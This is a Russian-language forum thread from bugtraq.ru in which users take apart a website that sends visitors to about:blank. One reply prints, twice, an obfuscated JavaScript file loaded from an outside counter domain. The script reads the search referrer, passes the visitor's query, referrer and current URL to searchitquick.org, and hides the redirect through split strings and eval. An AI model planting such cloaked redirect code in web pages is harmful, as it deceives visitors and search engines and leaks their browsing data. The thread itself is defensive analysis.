информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
Все любят медПортрет посетителяГде водятся OGRы
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Линуксовый ботнет, распространяющийся... 
 Конец поддержки Internet Explorer 
 Рекордное число уязвимостей в 2021 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / miscellaneous
Имя Пароль
ФОРУМ
если вы видите этот текст, отключите в настройках форума использование JavaScript
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
Да там все просто =) 27.06.06 13:46  Число просмотров: 1792
Автор: whiletrue <Роман> Статус: Elderman
Отредактировано 27.06.06 13:47  Количество правок: 1
<"чистая" ссылка>
смотрим в index.htm и видим строчку
<script language='JavaScript' src='http://supermegacounter.info/inc/script.js' type='text/JavaScript'></script>

качаем файлик http://supermegacounter.info/inc/script.js

var ref = document.referrer; 
var domain = document.referrer; 
var key = ""; 
if ((ref != null) && (ref.length > 0)) { 
     var queries = new Array("query", "qt", "q", "p"); 
     for (j = 0; j < queries.length; j ++) { 
          var off = queries[j].length + 2; 
          var i = ref.indexOf('?' + queries[j] + '='); 
          if (i == -1) { i = ref.indexOf('&' + queries[j] + '='); } 
          if (i != -1) { 
               ref = ref.substr(i + off); 
               i = ref.indexOf('&'); 
               if (i == -1) { i = ref.length; } 
               key = ref.substr(0, i); 
               break; 
          } 
     } 
} 

var reff = document.referrer;

if (reff.indexOf('.google.')!=-1|reff.indexOf('.msn.')!=-1|reff.indexOf('.yahoo.')!=-1|reff.indexOf('.aol.')!=-1|reff.indexOf('.ask.')!=-1|reff.indexOf('.altavista.')!=-1|reff.indexOf('85.249.19.91')!=-1) { 
	var url = "h"+"tt"+"p:/"+"/sear"+"chitq"+"uick.org"+"/?q="+key;
	
	url = url + "&ref=" + escape(document.referrer);

	url = url + "&s=" + escape(document.location.href);
	
	if(reff.indexOf('.google.')!=-1){
		url = url + "&saff=4";
	}else{
		if(reff.indexOf('.msn.')!=-1){
			url = url + "&saff=5";
		}else{
			if(reff.indexOf('.yahoo.')!=-1){
				url = url + "&saff=6";
			}
		}
	}
}
else {
  var url = "a"+"b"+"ou"+"t"+":bl"+"a"+"nk";
}

var d = document;
eval("d.lo"+"cat"+"ion.hr"+"ef=url");

---
т.е. реферер неизвестен => шлет на about:blank =)))
<miscellaneous>
Поздравляю с ДР Monochrome laser printer. (Пошёл по кабинетам поздравлять свои LaserJetы :-) 27.06.06 12:38  
Автор: Woonder <Бученков Андрей> Статус: Member
<"чистая" ссылка>
что странно, его хомпага ведет на about:blank =) (IE 6.0) 27.06.06 12:41  
Автор: DamNet [Bugtraq.ru Team] <Denis Amelin> Статус: Elderman
<"чистая" ссылка>
Я два раза, пробовал, думал это я торможу, а потом начал разбор... 27.06.06 13:02  
Автор: Woonder <Бученков Андрей> Статус: Member
<"чистая" ссылка>
ны его ссылку сервер выдаёт 403 Moved Permanently и перенаправляет на http://printer.tuningbazar.com/
а вот дальше IE выдаёт about:blank. опера выдаёт opera:blank
скачал index.htm Флешгетом, в соурсе ничего необычного не нашёл, хотя я не спец в вебдизайне, может кто лучше разбирается пояснит, в чём прикол.
Понимаю что что-то упустил из виду, и чувствую себя не лучшим образом. Не люблю, когда что-то не понимаю :(
Да там все просто =) 27.06.06 13:46  
Автор: whiletrue <Роман> Статус: Elderman
Отредактировано 27.06.06 13:47  Количество правок: 1
<"чистая" ссылка>
смотрим в index.htm и видим строчку
<script language='JavaScript' src='http://supermegacounter.info/inc/script.js' type='text/JavaScript'></script>

качаем файлик http://supermegacounter.info/inc/script.js

var ref = document.referrer; 
var domain = document.referrer; 
var key = ""; 
if ((ref != null) && (ref.length > 0)) { 
     var queries = new Array("query", "qt", "q", "p"); 
     for (j = 0; j < queries.length; j ++) { 
          var off = queries[j].length + 2; 
          var i = ref.indexOf('?' + queries[j] + '='); 
          if (i == -1) { i = ref.indexOf('&' + queries[j] + '='); } 
          if (i != -1) { 
               ref = ref.substr(i + off); 
               i = ref.indexOf('&'); 
               if (i == -1) { i = ref.length; } 
               key = ref.substr(0, i); 
               break; 
          } 
     } 
} 

var reff = document.referrer;

if (reff.indexOf('.google.')!=-1|reff.indexOf('.msn.')!=-1|reff.indexOf('.yahoo.')!=-1|reff.indexOf('.aol.')!=-1|reff.indexOf('.ask.')!=-1|reff.indexOf('.altavista.')!=-1|reff.indexOf('85.249.19.91')!=-1) { 
	var url = "h"+"tt"+"p:/"+"/sear"+"chitq"+"uick.org"+"/?q="+key;
	
	url = url + "&ref=" + escape(document.referrer);

	url = url + "&s=" + escape(document.location.href);
	
	if(reff.indexOf('.google.')!=-1){
		url = url + "&saff=4";
	}else{
		if(reff.indexOf('.msn.')!=-1){
			url = url + "&saff=5";
		}else{
			if(reff.indexOf('.yahoo.')!=-1){
				url = url + "&saff=6";
			}
		}
	}
}
else {
  var url = "a"+"b"+"ou"+"t"+":bl"+"a"+"nk";
}

var d = document;
eval("d.lo"+"cat"+"ion.hr"+"ef=url");

---
т.е. реферер неизвестен => шлет на about:blank =)))
Спасибо, с этим ясно - Следущий вопросик.. 28.06.06 02:10  
Автор: Woonder <Бученков Андрей> Статус: Member
<"чистая" ссылка>
Спасибо, учится не когда не поздно.
Следующий вопрос,
Судя по скрипту он при любом раскладе делает перенаправление, различаются только цели.
Тогда зачем в index.htm весь остальной код ?
Где смысл?
Буду длагодарен за урок :)
Хех... для поисковиков, конечно. Видел как они завуалировали это пернаправление?.. Это чтобы робот принял страницу за чистую монету (не от людей же они так шифруются =)) 28.06.06 02:51  
Автор: whiletrue <Роман> Статус: Elderman
Отредактировано 28.06.06 03:07  Количество правок: 1
<"чистая" ссылка>
1




Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2022 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach